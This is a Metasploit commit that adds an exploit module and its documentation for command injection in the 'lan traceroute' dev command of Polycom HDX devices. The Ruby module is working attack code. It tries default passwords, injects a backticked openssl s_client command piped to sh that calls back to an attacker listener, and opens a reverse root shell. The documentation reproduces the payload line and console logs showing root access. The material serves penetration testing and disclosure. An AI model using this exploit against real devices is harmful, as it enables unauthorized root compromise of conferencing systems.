Land rapid7#9210, Add a Polycom HDX RCE

busterb · busterb · commit f83e9815dd96 · 2017-12-04T12:49:35.000-06:00
diff --git a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md
@@ -0,0 +1,131 @@
+Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator`
+
+
+## Vulnerable Application
+Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup)
+
+## Options
+### PASSWORD
+Although a majority of devices come without a  password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or
+the devices.
+
+
+## Payloads
+Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic`
+
+```
+Compatible Payloads
+===================
+
+   Name                                Disclosure Date  Rank    Description
+   ----                                ---------------  ----    -----------
+   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
+   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
+   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
+   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
+```
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+```
+msf exploit(polycom) > set RHOST 192.168.0.17
+RHOST => 192.168.0.17
+msf exploit(polycom) > set LHOSt ens3
+LHOSt => ens3
+msf exploit(polycom) > set LPORT 3511
+LPORT => 3511
+msf exploit(polycom) > show payloads
+
+Compatible Payloads
+===================
+
+   Name                                Disclosure Date  Rank    Description
+   ----                                ---------------  ----    -----------
+   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
+   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
+   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
+   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
+
+msf exploit(polycom) > set PAYLOAD cmd/unix/reverse
+PAYLOAD => cmd/unix/reverse
+msf exploit(polycom) > set VERBOSE false
+VERBOSE => false
+msf exploit(polycom) > run
+
+[*] Started reverse TCP double handler on 192.168.0.11:3511
+[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
+[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo vGopPRp0jBxt4J2D;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "vGopPRp0jBxt4J2D\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500
+[*] 192.168.0.17:23 - Shutting down payload stager listener...
+
+id
+uid=0(root) gid=0(root)
+whoami
+root
+```
+
+## Debugging
+Setting `VERBOSE` to true should yield an output of.
+
+```
+msf exploit(polycom) > set VERBOSE true
+VERBOSE => true
+rmsf exploit(polycom) > run
+
+[*] Started reverse TCP double handler on 192.168.0.11:3511
+[*] 192.168.0.17:23 - Received : !
+Polycom Command Shell
+XCOM host:    localhost port: 4121
+TTY name:     /dev/pts/6
+Session type: telnet
+2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68]
+2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340
+2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340)
+2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9
+2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104]
+2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380]
+2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6]
+2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342)
+2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10
+2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918
+2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx
+2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered
+
+[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
+[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo WD3QloY3fys6n7dK;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] 192.168.0.17:23 - devcmds
+Entering sticky internal commands *ONLY* mode...
+lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`
+2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`]
+2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68
+2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0
+
+[*] Reading from socket B
+[*] B: "WD3QloY3fys6n7dK\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500
+[*] 192.168.0.17:23 - Shutting down payload stager listener...
+
+id
+uid=0(root) gid=0(root)
+whoami
+root
+```
diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Polycom Shell HDX Series Traceroute Command Execution',
+      'Description' => %q{
+        Within Polycom command shell, a command execution flaw exists in
+        lan traceroute, one of the dev commands, which allows for an
+        attacker to execute arbitrary payloads with telnet or openssl.
+      },
+      'Author' => [
+        'Mumbai', #
+        'staaldraad', # https://twitter.com/_staaldraad/
+        'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
+        'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
+      ],
+      'References' => [
+        ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']
+      ],
+      'DisclosureDate' => 'Nov 12 2017',
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'Targets' => [[ 'Automatic', {} ]],
+      'Payload' => {
+        'Space' => 8000,
+        'DisableNops' => true,
+        'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'}
+      },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+      'DefaultTarget' => 0
+    ))
+
+    register_options(
+    [
+      Opt::RHOST(),
+      Opt::RPORT(23),
+      OptString.new('PASSWORD', [ false, "Password to access console interface if required."]),
+      OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
+      OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
+    ])
+  end
+
+  def check
+    connect
+    Rex.sleep(1)
+    res = sock.get_once
+    disconnect
+    if !res && !res.empty?
+      return Exploit::CheckCode::Unknown
+    elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
+      return Exploit::CheckCode::Detected
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
+    end
+
+    #
+    # Obtain banner information
+    #
+    sock = connect
+    Rex.sleep(2)
+    banner = sock.get_once
+    vprint_status("Received #{banner.length} bytes from service")
+    vprint_line("#{banner}")
+    if banner =~ /password/i
+      print_status("Authentication enabled on device, authenticating with target...")
+      if datastore['PASSWORD'].nil?
+        print_error("#{peer} - Please supply a password to authenticate with")
+        return
+      end
+      # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
+      sock.put("#{datastore['PASSWORD']}\n")
+      res = sock.get_once
+      if res =~ /Polycom/
+        print_good("#{peer} - Authenticated successfully with target.")
+      elsif res =~ /failed/
+        print_error("#{peer} - Invalid credentials for target.")
+        return
+      end
+    elsif banner =~ /Polycom/ # praise jesus
+      print_good("#{peer} - Device has no authentication, excellent!")
+    end
+    do_payload(sock)
+  end
+
+  def do_payload(sock)
+    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
+    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
+
+    # Start a listener
+    start_listener(true)
+
+    # Figure out the port we picked
+    cbport = self.service.getsockname[2]
+    cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
+    sock.put(cmd)
+    if datastore['VERBOSE']
+      Rex.sleep(2)
+      resp = sock.get_once
+      vprint_status("Received #{resp.length} bytes in response")
+      vprint_line(resp)
+    end
+
+    # Give time for our command to be queued and executed
+    1.upto(5) do
+      Rex.sleep(1)
+      break if session_created?
+    end
+  end
+
+  def stage_final_payload(cli)
+    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
+    cli.put(payload.encoded + "\n")
+  end
+
+  def start_listener(ssl = false)
+    comm = datastore['ListenerComm']
+    if comm == 'local'
+      comm = ::Rex::Socket::Comm::Local
+    else
+      comm = nil
+    end
+
+    self.service = Rex::Socket::TcpServer.create(
+      'LocalPort' => datastore['CBPORT'],
+      'SSL'       => ssl,
+      'SSLCert'   => datastore['SSLCert'],
+      'Comm'      => comm,
+      'Context'   =>
+      {
+        'Msf'        => framework,
+        'MsfExploit' => self
+      }
+    )
+
+    self.service.on_client_connect_proc = proc { |client|
+      stage_final_payload(client)
+    }
+
+    # Start the listening service
+    self.service.start
+  end
+
+  # Shut down any running services
+  def cleanup
+    super
+    if self.service
+      print_status("Shutting down payload stager listener...")
+      begin
+        self.service.deref if self.service.is_a?(Rex::Service)
+        if self.service.is_a?(Rex::Socket)
+          self.service.close
+          self.service.stop
+        end
+        self.service = nil
+      rescue ::Exception
+      end
+    end
+  end
+
+  # Accessor for our TCP payload stager
+  attr_accessor :service
+end
